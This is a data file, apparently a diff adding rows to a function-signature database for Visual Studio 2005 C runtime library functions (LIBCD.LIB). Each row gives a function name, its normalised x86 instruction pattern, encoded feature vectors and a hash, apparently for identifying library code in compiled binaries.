+__check_range_exit,FLD QWORD PTR DS:[0]\nFXCH ST(1)\nFSCALE\nFSTP ST(1)\nFLD ST\nFABS\nFCOMP QWORD PTR DS:[0]\nWAIT,pIL5ogAAAAAAAAAAFrN0wgDh1mvqMoS4fYHSY6SC+aKkgvmiENtfM9WbAf99gdJj1ZsB/wAAAAAAAAAAAOHWawAAAAAAAAAA6jKEuNWbAf8Q218zJX6Urru2XCwf/P6nH/z+p7u2XCwAAAAA6FWr2iV+lK4Ws3TCu7ZcLKSC+aKkgvmiJX6Urru2XCwf/P6nH/z+p7u2XCwAAAAApIL5ogAAAAAAAAAAUeR0USV+lK7oVava,[],734d8d2b09816c47c316974a91dba93d469fe532,VS2005,LIBCD.LIB
+__load_CW,"MOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nOR R32,CONST\nMOV WORD PTR SS:[ESP+CONST],R16\nFLDCW WORD PTR SS:[ESP+CONST]\nRETN",VHLLFwAAAAAAAAAA,[],46cbb2df26bd2bfe216c39f4fdce97564cd05e46,VS2005,LIBCD.LIB
+__fast_exit,"CMP WORD PTR SS:[ESP],CONST\nJCC CONST",nO5/MADh1msGW9GDBlvRgwDh1msAAAAAAOHWawAAAAAAAAAA,[],ba6a423f1d3adc7932f361b9536fb58519d623a2,VS2005,LIBCD.LIB
+__check_overflow_exit,FLD QWORD PTR DS:[0]\nFXCH ST(1)\nFSCALE\nFSTP ST(1)\nFLD ST\nFABS\nFCOMP QWORD PTR DS:[0]\nWAIT,ENtfMwZb0YMqs0LeLsCOFehVq9oAAAAAAOHWawAAAAAAAAAAFrN0wgDh1mvqMoS4BlvRgwDh1msAAAAA6FWr2iV+lK4Ws3TCu7ZcLKSC+aKkgvmiJX6Urru2XCwf/P6nH/z+p7u2XCwAAAAApIL5ogAAAAAAAAAAKrNC3ru2XCwAAAAApIL5ogAAAAAAAAAA6jKEuAZb0YMQ218z,[],11956bdd40c0980c8cec6dd59f3006274fbdceb2,VS2005,LIBCD.LIB
+__fload_withFB,"MOV R32,DWORD PTR DS:[R32+CONST]\nSUB ESP,CONST\nOR R32,CONST\nMOV DWORD PTR SS:[ESP+CONST],R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32]\nSHLD R32,R32,CONST\nSHL R32,CONST",aQwXdgAAAAAAAAAAQbrgcDuKCkRpDBd2O4oKRAAAAAAAAAAA,[],03f5c6031d32d4d171bbbd0e57c6e96a1eea9029,VS2005,LIBCD.LIB
+__checkTOS_withFB,"MOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,[],34adcba4f0c20fcad44326c6704d9c0d67645a4b,VS2005,LIBCD.LIB
+__wremove,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",Ju7hZU+LzAoAAAAAlnPwX5yGUTgAAAAAqGrdepZz8F9sZhucnIZROCbu4WWZeO5vmXjub0+LzAoAAAAAT4vMCgAAAAAAAAAAbGYbnJyGUTgAAAAA,[],22920474c3a57beeaeeab380b9c4f579ebd09c8b,VS2005,LIBCD.LIB
+__wunlink,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",NV3SuwAAAAAAAAAA,Ju7hZU+LzAoAAAAAlnPwX5yGUTgAAAAAqGrdepZz8F9sZhucnIZROCbu4WWZeO5vmXjub0+LzAoAAAAAT4vMCgAAAAAAAAAAbGYbnJyGUTgAAAAA,a1cd9a193cdca3f0d3bd9876c6debf52e442d563,VS2005,LIBCD.LIB
+__except_handler3,"PUSH EBP\nLEA EBP,DWORD PTR DS:[R32+CONST]\nPUSH -1\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nMOV R32,CONST",RZ7D67u2XCwAAAAAyhErz0UU0t7SSp8Gl3FRnv5P0mgAAAAAu7ZcLJdxUZ75y5whIYd5Y5dxUZ5cUzXX/k/SaAAAAAAAAAAAXFM110Wew+sAAAAA+cucIUWew+tWMWGZl3FRnv5P0mgAAAAA0kqfBru2XCwAAAAARRTS3v5P0mgAAAAAVjFhmUWew+shh3lj,[],e9b5cddbe5e06aad022b6c568f9459697b135b38,VS2005,LIBCD.LIB
+__seh_longjmp_unwind@4,"PUSH EBP\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV EBP,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST",QdX/kwAAAAAAAAAA,O3R/QQAAAAAAAAAA,936491fb6c1fe0707ad971b313f0cd120eaeaeb1,VS2005,LIBCD.LIB
+__wgetcwd,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST",0TQKagAAAAAAAAAA,0TmH1Qaj7jkAAAAATKRmd5yGUTgAAAAAvPMtZE+LzAoAAAAAMbv6YZzh2CQvAnJCT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAUgVNsgaj7jkAAAAAincMmIOuQ16DrkNevPMtZE+LzAoAAAAAnIZROA3MwAF2e+A0ZDCwBE+LzAoAAAAALwJyQkykZnch+jsBdnvgNIp3DJgNzMABg65DXlIFTbLROYfVBqPuOV6jgye88y1knOHYJJyGUTgAAAAAXqODJ2QwsAQAAAAAg65DXmQwsAS88y1kIfo7AU+LzAoAAAAA,71a56ec09c9305cfa097ac4481ac1896ce7e7828,VS2005,LIBCD.LIB
+__wgetdcwd,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",g65DXlIFTbLROYfVnOHYJJyGUTgAAAAAXqODJ2QwsAQAAAAAg65DXmQwsAS88y1k0TmH1Qaj7jkAAAAABqPuOV6jgye88y1kIfo7AU+LzAoAAAAAMbv6YZzh2CQvAnJCT4vMCgAAAAAAAAAADczAAU+LzAoAAAAATKRmd5yGUTgAAAAAUgVNsgaj7jkAAAAAincMmIOuQ16DrkNevPMtZE+LzAoAAAAAvPMtZE+LzAoAAAAAnIZROA3MwAF2e+A0ZDCwBE+LzAoAAAAALwJyQkykZnch+jsBdnvgNIp3DJgNzMAB,[],62f44dfd7e6ed35b024d3a97f7b3ee2da54729eb,VS2005,LIBCD.LIB
+__mbctolower,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",oDc6oU+LzAoAAAAA3+IU/0+LzAoAAAAASsDrlgADk7H5VORYAAOTsfh3+cFvMaD/y4LLlU+LzAoAAAAA+Hf5wUFF0BsAAAAAQUXQG0+LzAoAAAAAazR24t/iFP+gNzqhT4vMCgAAAAAAAAAA+VTkWGs0duLLgsuVbzGg/0FF0BsAAAAA,[],0718cb2611c39ab754e2e0585c2d05633e49bb5c,VS2005,LIBCD.LIB
+_wcscoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",Pz4kcdo3INomTrz7chMCgD8+JHFAPBIrT4vMCgAAAAAAAAAA2jcg2k+LzAoAAAAAQDwSK0+LzAoAAAAAJk68+0+LzAoAAAAA,[],7585d6881b394939866e76caca0d8aec91c58bac,VS2005,LIBCD.LIB
+___wsetargv,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",XMvmW0wGv0u/HL4xvxy+MU+LzAp6yo2tFGUr6FzL5lsAAAAAesqNrU+LzAoAAAAATAa/S0+LzAp6yo2tGoQr90wGv0u/HL4xT4vMCgAAAAAAAAAAcxIAnhqEK/cUZSvo,[],467d288137c2caf0418fcededb7b60a54aa6d2cd,VS2005,LIBCD.LIB
+_strftime,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",BZ+jpQAAAAAAAAAA,dpz9mu6GpGEAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAjvYqnzUWchMnD3USEdehXbnLgDPKkjmGNRZyE2nNBgAAAAAANRZyE5yGUTgAAAAA+Hf5we6GpGEAAAAAnIZROCbu4WWG910gFISP8DUWchMAAAAA7oakYWnNBgAAAAAAucuAMzUWchMAAAAAhvddIE+LzAoAAAAAVaatKPh3+cF2nP2anIZROBSEj/AC0xFUJw91EhHXoV1eo4MnXqODJ3LGfl4AAAAAcsZ+XhSEj/CchlE4ac0GAJyGUTiO9iqfAtMRVDUWchMAAAAAypI5hjUWchMAAAAA,f65ea919d1b915460a24836242150c77b7d07edd,VS2005,LIBCD.LIB
+__Gettnames,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+R32*4]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",89KwWdTZ7ssAAAAA4CveDwAAAAAAAAAA1Nnuy/Qp7gjD1zkm9CnuCJyGUTgAAAAA1Nnuy/Qp7gjVs3efA1EllJyGUTgAAAAA9CnuCJyGUTgAAAAA1Nnuy2k8z8oi7cNARyfYewAAAAAAAAAA1Nnuy+Ar3g/z0rBZnIZROPQp7gjVs3efIu3DQNTZ7ssAAAAAnIZROPQp7gjD1zkmaTzPykcn2HswylDz1bN3n9TZ7ssAAAAAMMpQ85yGUTgAAAAAnIZROOAr3g/z0rBZw9c5JtTZ7ssAAAAAnIZROGk8z8oi7cNA,[],6f32c185050efcf45f55ab6c4ddb7ccbec594289,VS2005,LIBCD.LIB
+__Getdays,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",PsqG2ZyGUTgAAAAAA1EllJyGUTgAAAAAPkP73Ecn2HtUwZr8nIZROD5D+9zVs3efX36qiEcn2HsAAAAA1Nnuy19+qoh0B8in1bN3nz7KhtkAAAAAnIZROF9+qoh0B8inRyfYewAAAAAAAAAAdAfIp9TZ7ssAAAAAVMGa/JyGUTgAAAAA,[],21b0d7cfed8f7182ba8c95e075e97ea7b9f3d890,VS2005,LIBCD.LIB
+__Getmonths,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",nIZROD5D+9wi7cNAhnBFsAAAAAAAAAAA1Nnuy4ZwRbBsrvmmIu3DQNTZ7ssAAAAAnIZROIZwRbBsrvmmRyfYewAAAAAAAAAAbK75ptTZ7ssAAAAAVMGa/JyGUTgAAAAA1Nnuyz5D+9wi7cNAA1EllJyGUTgAAAAAPkP73Ecn2HtUwZr8,[],bac0141a30e8743591989219ce12ff2547322e50,VS2005,LIBCD.LIB
+__Strftime,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR DS:[0],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",Jw91EhHXoV1eo4MnjvYqnzUWchMnD3USNRZyE2nNBgAAAAAAd+c6y5yGUTiO9iqfnIZROCbu4WWG910gEdehXbnLgDPKkjmGXAH/tZyGUTiO9iqfucuAMzUWchMAAAAAhvddIE+LzAoAAAAAVaatKHfnOst2nP2aac0GAJyGUTiO9iqfnIZROAAAAAAAAAAAXqODJ3LGfl4AAAAAcsZ+XgAAAACchlE4NRZyE5yGUTgAAAAAypI5hjUWchMAAAAAdpz9mlwB/7UAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],555c1d9517a0afb20f4714a0f3456f9ea36625ac,VS2005,LIBCD.LIB
+__alldiv,"DIV R32\nMOV R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMUL R32\nADD R32,R32\nJCC CONST",cug6RaN6Gjugedeukl7TRBY4CCJluNrOFjgIInLoOkXdi7xkkXnTfgAAAAAAAAAAnIZROIdHUj8hh3ljgktfFIJLXxRQuNDw4XZcoJF5034AAAAA3Yu8ZHLoOkUAAAAAZbjaznLoOkXdi7xkIYd5Y3WBokOchlE4nIZROHWBokOHR1I/ULjQ8IdHUj+chlE4h0dSP3WBokMAAAAAdYGiQ5fae5QAAAAAoHnXrpfae5QAAAAAo3oaO4JLXxQAAAAAl9p7lJF5037hdlyg,[],390706d31b18736b18d6fbf58cb0bd812b1e9d65,VS2005,LIBCD.LIB
+__getdllprocaddr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nJMP SHORT CONST",WOq6VwDh1msAAAAAJu7hZQDh1msAAAAAAOHWawAAAAAAAAAAcMiU5JyGUTiLDRRMXqODJybu4WUAAAAAnIZROCbu4WVY6rpXiw0UTF6jgydY6rpXWOq6VwDh1msAAAAA,[],c2fe92e53754a54823d593cfcf33ff10d753df84,VS2005,LIBCD.LIB
+__commit,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",vRiNy0FF0BsAAAAAda1LDU+LzAoAAAAABmKIwwZiiMN1rUsNbGYbnJyGUTgAAAAA0XYVh0FF0BsAAAAAHBkUmpZz8F9sZhucBmKIw9F2FYccGRSalnPwX5yGUTgAAAAAQwR9VnWtSw0GYojDnIZROL0Yjcteo4MnQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAXqODJ0FF0BsAAAAA,[],d672eee37c0f8bd1d07b49bdb6faf156b945b13a,VS2005,LIBCD.LIB
+__execvpe,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",7xfqreRSvJ+S9NEBpBdjb5yGUTiIQh8MNRZyE5yGUTgAAAAAnIZROJFuf7yPuGMmpBdjb/UJhVxtSQUGdMD4cDUWchN0wPhw5FK8n5yGUTiDrkNej7hjJpFuf7wAAAAAnIZROORSvJ+S9NEBg65DXuRSvJ+S9NEBbUkFBvUJhVzTa/LaXqODJ40v/IgAAAAAkvTRAeRSvJ91gwavbUkFBo0v/Ii5zn1GkvTRAeRSvJ91gwavkW5/vAAAAAAAAAAAdMD4cDUWchOkF2Nvk90UgV6jgye8VTOIHxjoQaQXY2+T3RSBuc59RjUWchNAPBIrEIspc6QXY28AAAAApBdjbzV1kVQUcroEvFUziKQXY2+8VTOIdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvdYMGr5yGUTiDrkNedYMGr4OuQ17uHaHE5FK8n4OuQ17uHaHEFHK6BDUWchM1dZFUpBdjb+RSvJ+S9NEBjS/8iDUWchNAPBIr7h2hxORSvJ+S9NEBkvTRAeRSvJ91gwavNXWRVDe217g1FnITkvTRAeRSvJ91gwav9QmFXG1JBQaT3RSBvFUziKQXY29eo4Mnk90UgbxVM4iT3RSBkvTRAeRSvJ91gwav02vy2vUJhVwQiylzQDwSKx8Y6EEAAAAANRZyE5yGUTgAAAAAN7bXuKQXY281FnITdYMGr6QXY2+chlE45FK8n6QXY2+chlE4XqODJ5yGUTgAAAAAnIZROORSvJ+S9NEBNRZyE5yGUTgAAAAAHxjoQTUWchN0wPhwk90UgV6jgycAAAAAiEIfDKQXY2+chlE4dYMGr+4docQfGOhB5FK8n+4docQfGOhB,[],455ff7380bb9457aaad8894024e6804e95b1d762,VS2005,LIBCD.LIB
+__spawnl,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",dYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvkvTRAeRSvJ91gwavnIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEBdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvkvTRAeRSvJ91gwavdYMGr6QXY2/FRn8spBdjb+RSvJ+S9NEBkvTRAeRSvJ91gwavxUZ/LAAAAAAAAAAAdYMGr6QXY2+chlE45FK8n6QXY2+chlE4kvTRAeRSvJ91gwav5FK8n6QXY2/FRn8snIZROORSvJ+S9NEBs1oPwORSvJ+S9NEB,[],4886a27581f44c9215f078ebfdde477f9a2148bf,VS2005,LIBCD.LIB
+__wcwild,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",rydXXE+LzAoAAAAA/Ny5pBPiHR9JtNwKcxlq1JyGUTgAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAXqODJzUWchMAAAAALz7DNTUWchOvJ1dcSbTcCpEkTvIvPsM1rydXXE+LzAoAAAAArydXXE+LzAoAAAAATSgDSZyGUTgAAAAANRZyE/zcuaQAAAAAE+IdH5yGUTgAAAAAkzbjqU0oA0kAAAAALz7DNV6jgyevJ1dcPQDoy5yGUTgAAAAAduUUZhPiHR9JtNwKBhsjBZyGUTgAAAAAnIZROHclHjVeo4MnkSRO8i8+wzWLLp4gFFxEfXblFGYAAAAAdyUeNXMZatSvJ1dc3XDeWybu4WWxvFp8nIZROCbu4WWxvFp8sbxafN1w3lsAAAAAiy6eIF6jgyevJ1dcnIZROAYbIwWTNuOpXqODJzUWchMAAAAAXqODJz0A6MsAAAAArydXXE+LzAoAAAAA,[],f60e0f13437cb822823193742a33c8bcaace486e,VS2005,LIBCD.LIB
+__safe_fprem1,CALL CONST\nRETN,aNbbxwAAAAAAAAAA,Hs7ZdI7/u+lL1jUhT4vMCgAAAAAAAAAAjv+76U+LzAoAAAAA56OHuz75dtoeztl0Pvl22k+LzAoAAAAAS9Y1IU+LzAoAAAAA,a210fb1578c63f75a727ccb3e30e5e4aab52c130,VS2005,LIBCD.LIB
+__adj_fdiv_m32i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",w9mv3AAAAAAAAAAAGZUUxMPZr9zKmDbXypg21wAAAAAAAAAA,[],bed04218dd6abd7a130bf663bf48e935bf7efa2f,VS2005,LIBCD.LIB
+__safe_fdivr,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nCALL CONST\nADD ESP,CONST\nPOP R32\nRETN",HHWumwAAAAAAAAAA,Hs7ZdI7/u+lL1jUhT4vMCgAAAAAAAAAAjv+76U+LzAoAAAAAPxA7M7mtQ1ofmV7Cua1DWj75dtoeztl0Pvl22k+LzAoAAAAAH5lewrmtQ1oAAAAAS9Y1IU+LzAoAAAAA,6d3d87720aae26e7ecfe3afa37cc4f9f8635ff6c,VS2005,LIBCD.LIB
+__adj_fprem,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nXOR R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,CONST\nJCC CONST",AlPhzy/4PPIAAAAALzwFzAAAAAAAAAAAB5saMYS/H4wCU+HPqgHO6gAAAAAAAAAAL/g88gAAAAAAAAAAhL8fjC/4PPIAAAAArVm0/o1wE7+qAc7qjXATvy88BcwHmxox,[],8751bfc3d7ec6daffbf22b152e51dde3ff163d4b,VS2005,LIBCD.LIB
+__adj_fdivr_m32,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",xmTW/wAAAAAAAAAAtXs3jgAAAAAAAAAARemE7gAAAAAAAAAAJKWmE7V7N46SRPK3kkTyt0XphO7GZNb/,[],0284ed2067cdf2f6c422ba44f554dbd4182e3102,VS2005,LIBCD.LIB
+__adj_fdiv_m16i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD WORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",GZUUxKAf8U83xU33N8VN9wAAAAAAAAAAoB/xTwAAAAAAAAAA,[],2383ee5becf8fd9bfd13a05a0773cf13246226e7,VS2005,LIBCD.LIB
+__fdivrp_sti_st,"SUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nCALL CONST\nADD ESP,CONST\nRETN",8vqvVwAAAAAAAAAA,hQAJZQAAAAAAAAAA,bcf78a913cec15878d418160332e696e95d942ac,VS2005,LIBCD.LIB
+__adj_fptan,FPTAN\nRETN,7ncY0wAAAAAAAAAA,[],87a3d27ce74c44e7b71de1dbe1de6b8162c2cea2,VS2005,LIBCD.LIB
+__safe_fdiv,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFSTP TBYTE PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP R32\nRETN",9GrEbwAAAAAAAAAA,A5DZIQAAAAAAAAAA,978ea2d4134adc9320dff2e3c5fd5920abd4de9d,VS2005,LIBCD.LIB
+__fdivp_sti_st,"SUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFSTP TBYTE PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",WkHUhAAAAAAAAAAA,AaF1swAAAAAAAAAA,fcaebdee8b3fc941b578b1c85e2a60ce3da4f2b4,VS2005,LIBCD.LIB
+__adj_fdivr_m32i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",ypg21wAAAAAAAAAAw9mv3AAAAAAAAAAAGZUUxMPZr9zKmDbX,[],8fcb111be266b02f652d4a3d4bb3f3d59a154c3f,VS2005,LIBCD.LIB
+__adj_fdiv_r,"SUB ESP,CONST\nAND R32,CONST\nJMP DWORD PTR DS:[R32*4]",waAQGAAAAAAAAAAA,[],296f1d570bac1c16711234f0cb0864f2b91a4a73,VS2005,LIBCD.LIB
+__adj_fdivr_m64,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD QWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",JKWmE9Kg6GOSRPK3kkTyt+yGKkz9sQqY/bEKmAAAAAAAAAAA0qDoYwAAAAAAAAAA7IYqTAAAAAAAAAAA,[],e0502b6fdbc0a75f762aee17ee2f3c303db92d17,VS2005,LIBCD.LIB
+__adj_fdiv_m32,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",xmTW/wAAAAAAAAAAtXs3jgAAAAAAAAAARemE7gAAAAAAAAAAJKWmE7V7N46SRPK3kkTyt0XphO7GZNb/,[],7edd38eb83e9f2d02e043b4a867a90c6686be72e,VS2005,LIBCD.LIB
+__adj_fdivr_m16i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD WORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",GZUUxKAf8U83xU33N8VN9wAAAAAAAAAAoB/xTwAAAAAAAAAA,[],b43f0721851095088408e5d45b870f4362f7e4e4,VS2005,LIBCD.LIB
+__adj_fprem1,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nMOV R32,0\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,CONST\nJCC CONST",LzwFzAAAAAAAAAAAB5saMYEAgZ4CU+HPL/g88gAAAAAAAAAAgQCBngAAAAAAAAAAqgHO6gAAAAAAAAAAR0GcOo1wE7+qAc7qjXATvy88BcwHmxoxAlPhzy/4PPIAAAAA,[],6220f8a50ed00fe62cf75f52872316b191f63190,VS2005,LIBCD.LIB
+_fdiv_main_routine,"FSTCW WORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nOR R32,CONST\nAND R32,CONST\nMOV DWORD PTR SS:[ESP+CONST],R32\nFLDCW WORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST",7ncY0wAAAAAAAAAAUxsBMt/VD1Xf1Q9VXqODJ6/5oZ4AAAAAjIWZve53GNPZOsPJ43NfGgcuy9cuYiWV39UPVQAAAAAAAAAAr/mhnuNzXxoAAAAA7ncY0wAAAAAAAAAAa+sBlAAAAAAAAAAA2TrDyRY4CCLoVavaLmIllU8zHG3udxjT6FWr2mvrAZQWOAgijIWZve53GNPoVavaBy7L14yFmb3udxjT6FWr2u53GNNTGwEy7ncY0wAAAAAAAAAAFjgIImvrAZSv+aGeFjgIImvrAZReo4Mn39UPVQAAAAAAAAAARQxlQeNzXxoAAAAATzMcbYyFmb3udxjT,[],c5772be54341161c9b879edaf197ba76920765c4,VS2005,LIBCD.LIB
+__adj_fpatan,FPATAN\nRETN,7ncY0wAAAAAAAAAA,[],8892522858cd6654f9cda3054c9ee5b999bf5dc2,VS2005,LIBCD.LIB
+__fprem_common,"MOV R32,DWORD PTR SS:[ESP+CONST]\nFXCH ST(1)\nFSTP ST\nFLD TBYTE PTR SS:[ESP+CONST]\nFXCH ST(1)\nAND R32,CONST\nSUB ESP,CONST\nFSTENV (28-BYTE) PTR SS:[ESP]",FWCjCVjaKDqxde5H/ERPGFjaKDoJDxggJxwTP/smMBEX8myeXZ2BKBtA6pQ9cTVJOVp8YAAAAAAAAAAACQ8YIBtA6pTxzhSFsXXuR1jaKDoAAAAAPXE1SRtA6pSD6oDoG0DqlFjaKDoAAAAAWNooOjlafGBrtL2n8c4UhQkPGCAAAAAAg+qA6BtA6pR5zs6Fa7S9p6YOkpVxPrEVcT6xFaYOkpUAAAAAec7OhRtA6pQdHvziHR784htA6pTjc18aVtCasfsmMBEX8myepg6SlTlafGAAAAAA43NfGhtA6pTjc18aF/JsnlbQmrEVYKMJ+yYwEVbQmrEVYKMJ43NfGhtA6pT8RE8YWNooOiccEz9UHBXGVBwVxvsmMBEX8mye,[],3a408b5c03e3d5cc249ff9e5f17cd1e42be9c99f,VS2005,LIBCD.LIB
+__adj_fdiv_m64,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD QWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",7IYqTAAAAAAAAAAAJKWmE9Kg6GOSRPK3kkTyt+yGKkz9sQqY/bEKmAAAAAAAAAAA0qDoYwAAAAAAAAAA,[],6af9ea97d0d78ddd1455033b74d56e5c1e56545c,VS2005,LIBCD.LIB
+__fprem1_common,"MOV R32,DWORD PTR SS:[ESP+CONST]\nFXCH ST(1)\nFSTP ST\nFLD TBYTE PTR SS:[ESP+CONST]\nFXCH ST(1)\nAND R32,CONST\nSUB ESP,CONST\nFSTENV (28-BYTE) PTR SS:[ESP]",XZ2BKBtA6pQ9cTVJOVp8YAAAAAAAAAAACQ8YIBtA6pTxzhSFsXXuR1jaKDoAAAAAPXE1SRtA6pSD6oDoG0DqlFjaKDoAAAAAWNooOjlafGBrtL2n84pSRCccEz8AAAAA8c4UhQkPGCAAAAAAg+qA6BtA6pR5zs6Fa7S9p6YOkpVxPrEVcT6xFaYOkpUAAAAAec7OhRtA6pQdHvziHR784htA6pTjc18aVtCasfsmMBGXqcpKpg6SlTlafGAAAAAA43NfGhtA6pTjc18al6nKSvsmMBEAAAAA+yYwEVbQmrEVYKMJ43NfGhtA6pT8RE8YWNooOiccEz/zilJEFWCjCVjaKDqxde5H/ERPGFjaKDoJDxggJxwTP/smMBGXqcpK,[],658bf92ac646606235add246bbb566341f010227,VS2005,LIBCD.LIB
